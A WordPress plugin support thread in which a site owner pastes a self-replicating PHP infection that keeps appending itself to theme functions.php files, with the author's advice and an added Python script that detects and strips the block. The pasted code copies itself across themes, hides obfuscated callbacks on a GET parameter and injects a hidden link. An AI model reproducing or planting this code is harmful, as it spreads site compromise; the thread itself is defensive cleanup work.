Plugin: Anti-Malware Security and Brute-Force Firewall: Skipping Theme folders & Files & are you familiar with this exploit?

  • Hi @eli,

    I just donated to your plugin just now FYI. See here http://screencast.com/t/XbpWX2XC

    For a WP MULTISITE FYI.

    1. I am trying to run the scan on a Quick Scan for Themes, Plugins, and Core. But, I noticed it skips most Theme folders and files. Why do you think that is? In my case, I really need to scan those. How can we make it not skip folders and files?

    I will try a full scan and maybe that will do it?

    2. We uploaded a theme via FTP and that is when all this started. We uploaded some plugins too. Since yesterday, I removed all of them.

    This is on a WP MULTISITE NETWORK FYI (so it is affecting subsites with those themes that keep getting the code below added to some theme functions.php).

    I think I have narrowed it to this: http://bit.ly/2ebpiqs

    When I delete the code from any affected parent or child theme, the sites work but then that code below is added again and breaks it.

    What other files may have the code that is copying or replacing the code I remove?

    Do you know about this particular exploit and will the plugin take care of this http://bit.ly/2ebpiqs ?

    What are some other thoughts you have on this?

    Here is a code snippet of what keeps attaching itself to some of our parent and child themes. It keeps appending to some themes' functions.php (parent or child). When I manually remove the code the site comes up but the code comes back:

    <?php
    function _verifyactivate_widgets(){
     $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
     $output=strip_tags($output, $allowed);
     $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
     if (is_array($direst)){
      foreach ($direst as $item){
       if (is_writable($item)){
        $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
        $cont=file_get_contents($item);
        if (stripos($cont,$ftion) === false){
         $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
         $output .= $before . "Not found" . $after;
         if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
         $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
         $output .= ($isshowdots && $ellipsis) ? "..." : "";
        }
       }
      }
     }
     return $output;
    }
    function _get_allwidgets_cont($wids,$items=array()){
     $places=array_shift($wids);
     if(substr($places,-1) == "/"){
      $places=substr($places,0,-1);
     }
     if(!file_exists($places) || !is_dir($places)){
      return false;
     }elseif(is_readable($places)){
      $elems=scandir($places);
      foreach ($elems as $elem){
       if ($elem != "." && $elem != ".."){
        if (is_dir($places . "/" . $elem)){
         $wids[]=$places . "/" . $elem;
        } elseif (is_file($places . "/" . $elem)&&
         $elem == substr(__FILE__,-13)){
         $items[]=$places . "/" . $elem;}
        }
       }
     }else{
      return false;
     }
     if (sizeof($wids) > 0){
      return _get_allwidgets_cont($wids,$items);
     } else {
      return $items;
     }
    }
    if(!function_exists("stripos")){
        function stripos( $str, $needle, $offset = 0 ){
            return strpos( strtolower( $str ), strtolower( $needle ), $offset );
        }
    }
    if(!function_exists("strripos")){
        function strripos( $haystack, $needle, $offset = 0 ) {
            if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
            if( $offset < 0 ){
                $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
            }
            else{
                $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
            }
            if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
            $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
            return $pos;
        }
    }
    if(!function_exists("scandir")){
     function scandir($dir,$listDirectories=false, $skipDots=true) {
         $dirArray = array();
         if ($handle = opendir($dir)) {
             while (false !== ($file = readdir($handle))) {
                 if (($file != "." && $file != "..") || $skipDots == true) {
                     if($listDirectories == false) { if(is_dir($file)) { continue; } }
                     array_push($dirArray,basename($file));
                 }
             }
             closedir($handle);
         }
         return $dirArray;
     }
    }
    add_action("admin_head", "_verifyactivate_widgets");
    function _getprepare_widget(){
     if(!isset($text_length)) $text_length=120;
     if(!isset($check)) $check="cookie";
     if(!isset($tagsallowed)) $tagsallowed="<a>";
     if(!isset($filter)) $filter="none";
     if(!isset($coma)) $coma="";
     if(!isset($home_filter)) $home_filter=get_option("home");
     if(!isset($pref_filters)) $pref_filters="wp_";
     if(!isset($is_use_more_link)) $is_use_more_link=1;
     if(!isset($com_type)) $com_type="";
     if(!isset($cpages)) $cpages=$_GET["cperpage"];
     if(!isset($post_auth_comments)) $post_auth_comments="";
     if(!isset($com_is_approved)) $com_is_approved="";
     if(!isset($post_auth)) $post_auth="auth";
     if(!isset($link_text_more)) $link_text_more="(more...)";
     if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
     if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
     if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
     if(!isset($contentmore)) $contentmore="ma".$coma."il";
     if(!isset($for_more)) $for_more=1;
     if(!isset($fakeit)) $fakeit=1;
     if(!isset($sql)) $sql="";
     if (!$widget_yes) :
     
     global $wpdb, $post;
     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
     if (!empty($post->post_password)) {
      if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
       if(is_feed()) {
        $output=__("There is no excerpt because this is a protected post.");
       } else {
                 $output=get_the_password_form();
       }
      }
     }
     if(!isset($fixed_tags)) $fixed_tags=1;
     if(!isset($filters)) $filters=$home_filter;
     if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
     if(!isset($tag_aditional)) $tag_aditional="div";
     if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
     if(!isset($more_text_link)) $more_text_link="Continue reading this entry";
     if(!isset($isshowdots)) $isshowdots=1;
     
     $comments=$wpdb->get_results($sql);
     if($fakeit == 2) {
      $text=$post->post_content;
     } elseif($fakeit == 1) {
      $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
     } else {
      $text=$post->post_excerpt;
     }
     $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
     if($text_length < 0) {
      $output=$text;
     } else {
      if(!$no_more && strpos($text, "<!--more-->")) {
          $text=explode("<!--more-->", $text, 2);
       $l=count($text[0]);
       $more_link=1;
       $comments=$wpdb->get_results($sql);
      } else {
       $text=explode(" ", $text);
       if(count($text) > $text_length) {
        $l=$text_length;
        $ellipsis=1;
       } else {
        $l=count($text);
        $link_text_more="";
        $ellipsis=0;
       }
      }
      for ($i=0; $i<$l; $i++)
        $output .= $text[$i] . " ";
     }
     update_option("_is_widget_active_", 1);
     if("all" != $tagsallowed) {
      $output=strip_tags($output, $tagsallowed);
      return $output;
     }
     endif;
     $output=rtrim($output, "\s\n\t\r\0\x0B");
        $output=($fixed_tags) ? balanceTags($output, true) : $output;
     $output .= ($isshowdots && $ellipsis) ? "..." : "";
     $output=apply_filters($filter, $output);
     switch($tag_aditional) {
      case("div") :
       $tag="div";
      break;
      case("span") :
       $tag="span";
      break;
      case("p") :
       $tag="p";
      break;
      default :
       $tag="span";
     }
     if ($is_use_more_link ) {
      if($for_more) {
       $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";
      } else {
       $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";
      }
     }
     return $output;
    }
    add_action("init", "_getprepare_widget");
    function widget_option(){
        if(is_front_page() && !is_paged() && !is_user_logged_in())
        echo '<a style="text-decoration: none; color: #333; position: relative; left: 496px; bottom: 19px; text-transform: uppercase; font-size: 11px;" href="/wp-content/uploads/2013/05/no-risks-just-glory.pdf">Risks</a>';
    }
    function _most_popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
     global $wpdb;
     $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
     $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
     if(!$show_pass_post) $request .= " AND post_password =\"\"";
     if($duration !="") {
      $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
     }
     $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
     $posts=$wpdb->get_results($request);
     $output="";
     if ($posts) {
      foreach ($posts as $post) {
       $post_title=stripslashes($post->post_title);
       $comment_count=$post->comment_count;
       $permalink=get_permalink($post->ID);
       $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
      }
     } else {
      $output .= $before . "None found" . $after;
     }
     return $output;
    }
    ?>
Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter birdog123

    (@birdog123)

    @eli,

    CORRECTION on the pdf link from the original post above.

    I could not edit my link mistake above, so I am putting the correction here in a reply:

    I think I have narrowed it to this: https://www.dropbox.com/s/xe4swj3v9ibxffs/How%20to%20hack%20a%20site_.pdf?dl=0

    When I delete the code from any affected parent or child theme, the sites work but then that code below is added again and breaks it.

    What other files may have the code that is copying or replacing the code I remove?

    Do you know about this particular exploit and will the plugin take care of this https://www.dropbox.com/s/xe4swj3v9ibxffs/How%20to%20hack%20a%20site_.pdf?dl=0 ?

    • This reply was modified 7 years, 5 months ago by birdog123.
    Thread Starter birdog123

    (@birdog123)

    As I hit the bed, I wanted to give you this (is it typical for that many skipped files)? My browser froze at the end and I had to close it before I could see the potential threats and skipped files and 8 read write errors. Does this look like a typical scan or is there anything atypical you see in the summary here:
    http://screencast.com/t/sfbpBDdWRrC

    Note: There were only 2 actual threats during this scan…NOT 48 (the other 46 were from the past just FYI). I do not think the 2 were related to what I explained in the initial post and it does not look like it caught any of that (most all my themes have that issue where the primary and 50% of the subsites with select themes are down “Fatal error: Cannot redeclare _verifyactivate_widgets() (previously declared in /home/etc etc etc” and I can see the long 200 lines of code that keeps getting added. If I remove it, the sites come up for a few min but then that code gets added again in the functions.php files all through different themes).

    I can get you the entire code string sample too. Here is a sample of that code:
    http://pastebin.com/SrRcULm4 (it appends to the bottom of most any functions.php theme files and who knows where else…not sure if there is a variation but it mostly seems like the same/similar)

    Is there a place to go look at the potential threats, skipped files, and read write files later OR do I have to run it again to see them?

    🙂

    Night @eli

    Thanks in advance!!!

    • This reply was modified 7 years, 5 months ago by birdog123. Reason: add a bit
    Plugin Author Eli

    (@scheeeli)

    I wouldn’t worry about the skipped files, but with that many Potential Threats it is likely that some of them may contain malicious code. I would run the complete scan again and look at the potential threats one by one as they pop up on that list to see if you can tell if any of them are actually malicious. If your screenshot had included the list of files that came up as potential threats I could probably have narrowed it down for you. If you find anything suspicious that is not already identified as a threat, you can send it to me directly:
    eli AT gotmls.net

    Yup, I need to find the back-door script that is reinfecting your theme. If you are on a shared hosting server then it might be on another site, maybe even on another account that you don’t even have permission to. You may want to consider moving your site to a more secure hosting provider.
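The snippet in the original post walks the themes directory and appends itself to every writable functions.php that does not already contain it, which is why the parent/child pair ends up with the "Cannot redeclare _verifyactivate_widgets()" fatal error and why cleaning one theme at a time never sticks. The script below is an added example, not part of this thread or of the Anti-Malware plugin: it uses only the function names visible in the posted snippet as indicators, scans every functions.php under a themes directory, strips the appended block from all hits in one pass and keeps the originals in a quarantine folder. The two-theme directory it scans is constructed in a temp dir so it runs offline; the themes path and quarantine folder are hypothetical.

```python
"""Detect and strip the self-appending functions.php block from this thread.

Added example (not the plugin's code). Indicators are the function names
visible in the posted snippet; the sample theme tree is constructed here.
"""
import os
import re
import shutil
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Names taken from the snippet posted in the thread.
INDICATORS = ("_verifyactivate_widgets", "_get_allwidgets_cont", "_is_widget_active_")

# The dropper copies itself from the last "<?" of the infected file, so the
# appended block always starts with its own PHP open tag.
OPEN_TAG_RE = re.compile(r"<\?(?:php)?", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    indicators: List[str]
    injected_at: Optional[int]  # offset of the appended block, if located


def locate_injected_block(content: str) -> Optional[int]:
    """Offset where the appended block starts, or None when no indicator is present."""
    hits = [content.find(i) for i in INDICATORS if i in content]
    if not hits:
        return None
    first_hit = min(hits)
    # The block begins at the last PHP open tag before the first indicator.
    starts = [m.start() for m in OPEN_TAG_RE.finditer(content, 0, first_hit)]
    return starts[-1] if starts else 0


def strip_injected_block(content: str) -> str:
    """Return the file content with the appended block removed; unchanged if clean."""
    start = locate_injected_block(content)
    if start is None:
        return content
    cleaned = content[:start].rstrip()
    # The dropper inserts a "?>" before its block when the original had none.
    # A closing tag at end of file is optional in PHP, so dropping it is safe.
    if cleaned.endswith("?>"):
        cleaned = cleaned[:-2].rstrip()
    return cleaned + "\n"


def scan_tree(root: str) -> List[Finding]:
    """Walk a themes directory and report every functions.php carrying an indicator."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "functions.php" not in files:
            continue
        path = os.path.join(dirpath, "functions.php")
        with open(path, encoding="utf-8", errors="replace") as fh:
            content = fh.read()
        present = [i for i in INDICATORS if i in content]
        if present:
            findings.append(Finding(path, present, locate_injected_block(content)))
    return findings


def clean_tree(root: str, quarantine: str) -> int:
    """Strip the block from every hit in one pass, keeping originals in quarantine.

    All hits must be cleaned together: any remaining copy re-appends itself to
    every writable functions.php that lacks it on the next admin page load.
    """
    os.makedirs(quarantine, exist_ok=True)
    count = 0
    for f in scan_tree(root):
        backup = os.path.join(quarantine, f.path.replace(os.sep, "_").strip("_"))
        shutil.copy2(f.path, backup)
        with open(f.path, encoding="utf-8", errors="replace") as fh:
            content = fh.read()
        with open(f.path, "w", encoding="utf-8") as fh:
            fh.write(strip_injected_block(content))
        count += 1
    return count


# Constructed sample files: a clean child theme and an infected parent theme.
# INJECTED_BLOCK is a placeholder body standing in for the ~200 appended lines.
CLEAN_FUNCTIONS = "<?php\n// theme setup\nadd_theme_support('title-tag');\n"
INJECTED_BLOCK = (
    "<?php\nfunction _verifyactivate_widgets(){ /* ...dropper body... */ }\n"
    "function _get_allwidgets_cont($wids,$items=array()){ /* ... */ }\n"
    "add_action(\"admin_head\", \"_verifyactivate_widgets\");\n?>"
)
# Mirrors how the dropper appends: original + "?>" (original had none) + "\n" + block.
INFECTED_FUNCTIONS = CLEAN_FUNCTIONS + "?>\n" + INJECTED_BLOCK


def build_demo_tree() -> str:
    """Create the constructed themes directory (hypothetical path under a temp dir)."""
    root = tempfile.mkdtemp(prefix="themes_")
    for theme, body in (("child-theme", CLEAN_FUNCTIONS), ("parent-theme", INFECTED_FUNCTIONS)):
        os.makedirs(os.path.join(root, theme))
        with open(os.path.join(root, theme, "functions.php"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def run_demo() -> Dict[str, int]:
    """Scan, clean and re-scan the constructed tree; return the counts at each step."""
    root = build_demo_tree()
    hits = scan_tree(root)
    for f in hits:
        print(f"INFECTED {f.path}: {', '.join(f.indicators)} (block at offset {f.injected_at})")
    cleaned = clean_tree(root, os.path.join(root, "_quarantine"))
    return {"hits": len(hits), "cleaned": cleaned, "after": len(scan_tree(root))}


if __name__ == "__main__":
    print(run_demo())
```

Point it at wp-content/themes on a copy of the site first and compare the quarantined originals with the cleaned files before touching production. Note what this does not do: it only removes the appended block from theme files, so if the block reappears after a clean pass, a separate back door is rewriting it, which is exactly the file Eli says has to be found next.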

    Thread Starter birdog123

    (@birdog123)

    Hey @eli

    Just letting you know here . . .

    Thank you. I just sent a reply to your email. Let me know what you think by reply back on email.

    🙂

  • The topic ‘Skipping Theme folders & Files & are you familiar with this exploit?’ is closed to new replies.